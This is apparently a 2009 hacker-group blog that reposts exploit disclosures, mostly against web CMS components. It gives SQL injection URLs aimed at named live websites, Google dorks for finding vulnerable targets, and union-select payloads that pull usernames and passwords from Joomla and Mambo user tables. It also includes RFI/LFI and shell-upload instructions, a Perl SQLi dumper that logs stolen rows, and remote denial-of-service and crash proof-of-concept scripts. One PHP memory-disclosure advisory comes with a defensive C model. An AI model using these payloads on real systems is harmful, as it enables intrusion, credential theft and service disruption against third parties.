Wednesday, December 23, 2009

merry christmas 2009 and happy new year 2010






Praying the blessings of the season
will refresh you this Christmas and
throughout the coming year

Monday, December 14, 2009

Eurologon CMS SQL Injection Vuln

Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?id=[SQL]

[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*

[o] Dork
"Powered by Eurologon"

[o] Notes
this is a private script.

Saturday, November 28, 2009

Joomla Component com_lyftenbloggie Remote SQL injection vulnerability

#############################################################################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability - (author) ##
## Author : kaMtiEz (kamzcrew[at]yahoo[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
#############################################################################################

[ Software Information ]

[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################

[ Vulnerable File ]

http://server/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]

[ Exploit ]

http://server/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--

#############################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ]

[+] Dad, Mom, little sibling, I love you all so much ..
[+] After meditating aimlessly with Uncle Don Tukuesto ... finally found a hole :D
[+] M3NW5, I'll be waiting for you in my city ... hahaha

[ QUOTE ]

[+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 days searching for AuraKasih, who knows where you are now, darling ..
[+] AURAKASIH, call me, okay .. haha

Friday, November 27, 2009

Flashden Shell Upload Vulnerability

# Exploit Title: Flashden Shell Upload Vulnerability

# Date: 26.12.2009

# Author: DigitALL

# Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members

# Vendor: http://www.jurgenvisser.nl

# Version: 2.0

# Dork: inurl:"select_file2.php"

# Application: Please Add Files ( Your Shell ) And Upload.

# Shell: /test/shell.php -- /up/shell.php -- /upload/shell.php -- /beta/shell.php OR one back dir.

Wednesday, November 25, 2009

Idul-Adha 1428H


Happy Eid al-Adha 1428 H

Thursday, October 15, 2009

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

<?php
/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
die("Can't copy file");
}
else
{
echo "File succesfully copied.Open Spider Solitaire and load the
last saved game";
};
?>

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09

import sys
import socket
import os


def main(argc , argv):

if len(sys.argv) != 2:
os.system("cls")
sys.exit("Usage: " + sys.argv[0] + " \n")

target_host = sys.argv[1]
target_port = 5060

evil_packet =
"\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"

os.system("cls")
print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
print "[+] Exploited By Gr33n_G0bL1n\r\n"
print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_host,target_port))
print "[+] Trying To Send Evil Packet...\r\n"
s.sendall(evil_packet)
s.close()
print "[+] Done!\r\n"
except:
print "[x] Connection Error!\r\n"


if (__name__ == "__main__"):
sys.exit(main(len(sys.argv), sys.argv))

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 06.08.2009

Risk: High

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore - Restores the value of a configuration option

ini_restore ( string $varname )

- --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exists in restoring PHP config environments. To demonstrate
the problem, we need to declare variables via the ini_set() function. When we
try to use ini_restore(), variables in class PG() will indicate any part of
memory.

- ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage
TSRMLS_DC) /* {{{ */
{
if (ini_entry->modified) {
if (ini_entry->on_modify) {
zend_try {
/* even if on_modify bails out, we have to continue on with restoring,
since there can be allocated variables that would be freed on MM
shutdown
and would lead to memory corruption later ini entry is modified again
*/
ini_entry->on_modify(ini_entry, ini_entry->orig_value,
ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2,
ini_entry->mh_arg3, stage TSRMLS_CC);
} zend_end_try();
}
if (ini_entry->value != ini_entry->orig_value) {
efree(ini_entry->value);
}
ini_entry->value = ini_entry->orig_value;
ini_entry->value_length = ini_entry->orig_value_length;
ini_entry->modified = 0;
ini_entry->orig_value = NULL;
ini_entry->orig_value_length = 0;
if (ini_entry->modifiable >= (1 << 3)) {
ini_entry->modifiable >>= 3;
}
}
return 0;
}
- ---zend_ini.c---

The modified flag will be reset, and the variable can no longer be considered
modified. We don't check the value of ini_entry->on_modify(), and PG() will
now be out of memory range.

To demonstrate this issue

- ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php
<?php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>
127# php /var/www/www/sess.php AAA
PHP Warning: session_start():
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct ($­|ma: no-cache)
in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (¤^j|ma: no-cache)
in Unknown on line 0
- ---example0 (5.2.10/5.3.0)---

The main problem starts in ini_restore("session.save_path"). To show
this issue, we need to use some function with PG() inside (like:
session_start()).

- ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies
127# cat /www/file.php
<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>

127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7

Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7
PHP Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

127# curl http://localhost/file.php

Warning: include() [function.include]: open_basedir restriction in
effect. File(B) is not within the allowed path(s): (°?e»Hup») in
/www/file.php on line 7

Warning: include(B) [function.include]: failed to open stream:
Operation not permitted in /www/file.php on line 7

Warning: include() [function.include]: Failed opening 'B' for
inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on
line 7

- ---example1 (5.3.0)---

Variable PG(open_basedir) is now out of range. So any function (like:
include()) with

php_error_docref(NULL TSRMLS_CC, E_WARNING, "open_basedir restriction in
effect. File(%s) is not within the allowed path(s): (%s)", path,
PG(open_basedir));

will print memory

examples:
- ---
Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (¤©f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (,ªf»aaaaaa) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (?¬f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (ÈËe»ef_root)
in /www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (4Íe»r.ini) in
/www/ssij.php on line 8
- ---

Variables in class PG, may take any value.
So code such as

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC))

can be manipulated.

But zend_ini.c is not the only file with an issue. When we try to use
ini_set() and ini_restore() for error_log, PHP will crash.

The function OnUpdateErrorLog doesn't check whether new_value is empty (NULL
pointer). This should lead to a crash.

- ---main.c---
static PHP_INI_MH(OnUpdateErrorLog)
{
...
/* Only do the safemode/open_basedir check at runtime */
if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS)
&& strcmp(new_value, "syslog")) {
...
- ---main.c---

strcmp(3) will check new_value. So new_value can not be NULL.

here:

STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
error_log, php_core_globals, core_globals)


default error_log is NULL

...("error_log", NULL,...

so if we put some string, and remove it, php should crash

127# php -r 'ini_set("error_log","A");ini_restore("error_log");'
Segmentation fault (core dumped)

127# gdb -q php
(gdb) r -r 'ini_set("error_log","A");ini_restore("error_log");'
Starting program: /usr/local/bin/php -r
'ini_set("error_log","A");ini_restore("error_log");'

Program received signal SIGSEGV, Segmentation fault.
0x288ee410 in strcmp () from /lib/libc.so.7

bt:
#0 0x288ee410 in strcmp () from /lib/libc.so.7
#1 0x081c7b85 in OnUpdateErrorLog (entry=0x28a65a80, new_value=0x0,
new_value_length=3, mh_arg1=0x38, mh_arg2=0x83d5420, mh_arg3=0x0,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/main/main.c:354
#2 0x0824cb85 in zend_restore_ini_entry_cb (ini_entry=0x28a65a80,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/Zend/zend_ini.c:55
#3 0x0824d3f5 in zend_restore_ini_entry (name=0x28a1e36c "error_log",
name_length=10, stage=16)
...

Functions like OnUpdateErrorLog should check that new_value is not a NULL
pointer.

- --- 2. Fix ---
(5.3.0):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

(5.2.10):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c

- --- 3. Greets ---
stas

sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkp7FoMACgkQpiCeOKaYa9YWFwCbBhEvA69nQDgwXyuDdU8wbjmu
ZIEAniHiQ3puTKqEtw9u8g6/T/806j7A
=DvtO
-----END PGP SIGNATURE-----
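
An added example, not code from the advisory or from PHP: a simplified C model of the restore path in the zend_ini.c listing above, next to a hardened form that honours the handler's result, plus the NULL check the advisory asks for in handlers like OnUpdateErrorLog. The struct, g_setting, both handlers and stale_after_restore() are hypothetical stand-ins; only the field names come from the listing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SUCCESS 0
#define FAILURE (-1)

/* Simplified stand-in for zend_ini_entry; field names follow the listing. */
typedef struct ini_entry ini_entry;
typedef int (*handler_fn)(ini_entry *e, const char *new_value);
struct ini_entry {
    char *value;       /* current value (heap copy once modified) */
    char *orig_value;  /* value before ini_set(); may be NULL */
    int modified;
    handler_fn on_modify;
};

static const char *g_setting;  /* plays the role of a PG() global */
static int g_path_checks;      /* times the path-policy branch was taken */

/* Constructed policy handler: refuses an empty value at runtime and leaves
 * the cached global untouched when it refuses. */
static int on_modify_policy(ini_entry *e, const char *new_value)
{
    (void)e;
    if (new_value == NULL || new_value[0] == '\0')
        return FAILURE;
    g_setting = new_value;
    return SUCCESS;
}

/* Handler in the style of OnUpdateErrorLog with the NULL check the advisory
 * asks for; the entry's default is NULL, so a restore passes NULL here. */
static int on_modify_log(ini_entry *e, const char *new_value)
{
    (void)e;
    if (new_value != NULL && strcmp(new_value, "syslog") != 0)
        g_path_checks++;  /* a real handler would validate the path here */
    g_setting = new_value;
    return SUCCESS;
}

/* Model of ini_set(): store a heap copy and remember the original value. */
static int ini_set_model(ini_entry *e, const char *new_value)
{
    char *copy = malloc(strlen(new_value) + 1);
    if (copy == NULL)
        return FAILURE;
    strcpy(copy, new_value);
    if (e->on_modify && e->on_modify(e, copy) == FAILURE) {
        free(copy);
        return FAILURE;
    }
    if (e->modified)
        free(e->value);
    else
        e->orig_value = e->value;
    e->modified = 1;
    e->value = copy;
    return SUCCESS;
}

/* check_result == 0 mirrors the listing (handler result ignored), 1 is the
 * hardened form. *stale is set when the global still pointed at the buffer
 * that is about to be freed. */
static int restore_model(ini_entry *e, int check_result, int *stale)
{
    *stale = 0;
    if (!e->modified)
        return SUCCESS;
    if (e->on_modify && e->on_modify(e, e->orig_value) == FAILURE && check_result)
        return FAILURE;  /* keep e->value alive: the global references it */
    if (e->value != e->orig_value) {
        *stale = (g_setting == e->value);
        free(e->value);
    }
    e->value = e->orig_value;
    e->orig_value = NULL;
    e->modified = 0;
    return SUCCESS;
}

/* ini_set("A") followed by a restore; returns 1 if the global went stale. */
int stale_after_restore(handler_fn handler, int check_result)
{
    ini_entry e = { NULL, NULL, 0, handler };
    int stale = 0;
    if (ini_set_model(&e, "A") != SUCCESS)
        return -1;
    if (restore_model(&e, check_result, &stale) == FAILURE)
        free(e.value);  /* restore refused: value was still live */
    g_setting = NULL;   /* never dereference a possibly stale pointer */
    return stale;
}

int main(void)
{
    printf("ignored=%d checked=%d null-safe=%d\n",
           stale_after_restore(on_modify_policy, 0),
           stale_after_restore(on_modify_policy, 1),
           stale_after_restore(on_modify_log, 0));
    return 0;
}
```

The stale flag is computed before free(), so the model never reads freed memory; in the real engine the equivalent stale PG() pointer is what the warnings above print.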

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]

Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]

file: /lib/function.php

// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php"; line 8
include "$apps_path[libs]/fn_phonebook.php"; line 9
include "$apps_path[libs]/fn_core.php"; line 10
include "$apps_path[libs]/fn_themes.php"; line 11

// init global variables
include "$apps_path[libs]/lib_init1.php"; line 14

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; line 17

// init global variables
include "$apps_path[libs]/lib_init2.php"; line 65

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; line 68

http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]

[o]====================================[o]

file: /plugin/themes/default/init.php

include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; line 3

http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]

[o]====================================[o]

file: /plugin/gateway/gnokii/init.php

include "$apps_path[plug]/gateway/$gateway_module/config.php"; line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; line 3

http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]

[o]====================================[o]

I think this bug was published by
ahmadbady [kivi_hacker666@yahoo.com] for playSMS version 0.9.3,
but the vendor still hasn't fixed the bug in playSMS version 0.9.4,
so it's not the same version, right? :D

poke-poke
: All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot,
em|nem, s4va,
kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n

./noname

[o]====================================[o]

Sunday, October 4, 2009

jasakom has been hacked

Redcat Media SQL Injection Vulnerability

[x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 October 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php


[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]

Monday, September 28, 2009

Simple SQLi Dumper (SSDp) v0.1 GUI




take from c0li.m0de.0n




<?

#!/usr/bin/perl


# Simple SQLi Dumper (SSDp) v2.2
# Coded by Vrs-hCk
# ander[at]antisecurity.org
# Anti Security Team

# Example: http://localhost/index.php?id=-1+union+select+1,2,3,c0li,5

use HTTP::Request;
use LWP::UserAgent;

my $c0de = "0x63306C69";
my $logo = "SSDp";

print "\n *************************************\n";
print " * Simple SQLi Dumper 2.2 *\n";
print " * Coded By Vrs-hCk *\n";
print " * MainHack.net - AntiSecurity.org *\n";
print " *************************************\n\n";

print " [$logo] SQLi URL (c0li inside) : "; chomp ($sqli = );
print " [$logo] SQLi End Tag : "; chomp ($sql_end = );

print " [$logo] DB Name (leave blank for use current db) : "; chomp ($db_name = );
print " [$logo] Table Name : "; chomp ($table_name = );
print " [$logo] Columns Name (separate by comma char) : "; chomp ($columns = );

print " [$logo] Start Limit : "; chomp ($id_start = );
print " [$logo] Stop Limit : "; chomp ($id_end = );
print " [$logo] Log File : "; chomp ($sql_log = );

print "\n [$logo] DUMPING DATA ...\n\n";

my $concat = "CONCAT(".$c0de.",CONCAT_WS(0x3a,$columns),".$c0de.")";
my $query = str_replace($sqli,"c0li",$concat);
print " [$logo] [$table_name] $columns :\n\n";

for ($id=$id_start; $id<=$id_end; $id++) { my $exploit = $query."+FROM+".$db_name.".".$table_name."+LIMIT+".$id.",1".$sql_end; if ($db_name eq "") { $exploit = $query."+FROM+".$table_name."+LIMIT+".$id.",1".$sql_end; } my $res = get_content($exploit); if ($res =~ m/c0li(.+?)c0li/g) { my $data = $1; open(DAT,">>$sql_log") || die(" [$logo] Cannot Open File.\n");
print DAT "$data\n";
close(DAT);
print " [$logo] ID ($id) $data\n";
}
}

print "\n [$logo] Finish.\n\n";

sub str_replace {
my $source = shift;
my $search = shift;
my $replace = shift;
$source =~ s/$search/$replace/ge;
return $source;
}

sub get_content() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(10);
my $res = $ua->request($req);
if ($res->is_error){
print " [$logo] ID [timeout]\n";
}
return $res->content;
}

# AntiSecurity.org [10-09-2009]

Sunday, September 27, 2009

Metasploit Framework

Metasploit provides useful information to people who
perform penetration testing, IDS signature development,
and exploit research. This project was created to
provide information on exploit techniques and to
create a useful resource for exploit developers
and security professionals. The tools and information
on this site are provided for legal security research
and testing purposes only. Metasploit is a community project
managed by Metasploit LLC.



Metasploit 3.3 for WIN.32

Metasploit 3.3 for UNIX

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()

Friday, September 25, 2009

Mambo/Joomla SQL Injection Vulnerability

#######################################################
## Mambo/Joomla SQL Injection Vulnerability ##
## Component : com_tupinambis ##
## Release : September 23, 2009 ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-. .---..---..---..----. ##
##`| |'| || || . < | || || |__ | |- \ \ `| |'| || | ##
## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ##
##-------------------------------------------------- ##
#######################################################

[+] Author : Don Tukulesto
[+] Homepage : http://www.indonesiancoder.com
[+] Location : Republik Indonesia

#######################################################

[ Software Information ]

[+] Software : com_tupinambis
[+] Version : 1.0
[+] Vendor : www.tupinambis.net
[+] Download :
http://www.onestopjoomla.com/extensions/auction/tupinambis/
[+] Vulnerability : SQL Injection
[+] Google Dork : xxxxxxx

#######################################################
[ ExPL0!T ]

[+] Mambo :
http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=
-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,
9,10,11+from+mos_users--

[+] Joomla :
http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=
-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,
9,10,11+from+jos_users--

#######################################################

[ Greetings ]

[+] All of Indonesian Coder Member, M3NW5, mistersaint, gonzhack, m364tr0n,
cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Quick_5ilv3r, ran, m4ho666, Den Bayan, vyc0d, bh4nd55,
Den Awink
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO,
DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666 + tante Miya, kecemplungkalen,
xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom, Pathloader, tiw0L,
[+] V3n0m, Str0ke, sp3x, todd, Antisecurity.org, and YOU !!!

[ SHOUT ]

Happy Eidul Fitri 1430H.

Minal Aidin Wal Faidzin.

[ SP3C!AL ]

lovely Mom, Dad, and my dear little sibling (^_^)

Joomla Component com_fastball (league) Remote SQL Injection Vulnerability

#############################################################################################################
## Joomla Component com_fastball Remote SQL injection vulnerability - (league) ##
## Author : kaMtiEz (kamzcrew[at]gmail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 23, 2009 ##
#############################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32
